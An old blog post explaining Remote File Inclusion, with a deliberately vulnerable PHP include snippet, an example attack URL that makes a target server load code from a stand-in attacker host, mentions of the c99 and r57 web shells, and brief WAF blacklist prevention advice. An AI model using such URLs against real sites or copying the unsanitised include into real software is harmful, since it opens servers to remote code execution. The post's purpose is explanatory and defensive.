Thursday, November 17, 2011

REMOTE FILE INCLUSION

  • Whai is RFI ?
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.




An attacker can use RFI for:

  • Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.
  • Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, Javascript to steal the client session cookies).

  • Example:
Typically, RFI attacks are performed by setting the value of a request parameter to a URL that refers to a malicious file. Consider the following PHP code:

<?php
$page = $_REQUEST["page"];
include($page.".php");
?>

The first line of code extracts the value of the page parameter from the HTTP request. The second line of code dynamically sets the page name to be included using the extracted value. If the web application does not properly sanitize the value of the page parameter, this code can be exploited.

Consider the following URL:

http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicious

In this case the included page name will resolve to:
http://www.attacker.com/malicious.php 

Thus, the remote file will be included and any malicious code in it will be run by the server. Most popular of them are c99 or r57 shell which allows an attacker to browse the filesystem, upload, view, and edit files as well as move files, delete files, and even change permissions, all as the web server.


  • Prevention:
The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web application. Now we can improve the detection and blocking of such attacks by creating a blacklist of attack sources and a black list of URLs of remotely included malicious scripts:

1. Advanced knowledge of RFI attack sources enables the WAF to block an attack before it even begins.

2. A blacklist of the referenced URL enables the WAF to block exploits targeting zero-day vulnerabilities of applications.

3. The blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources.


Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

No comments:

Post a Comment

If you like this post, comment please...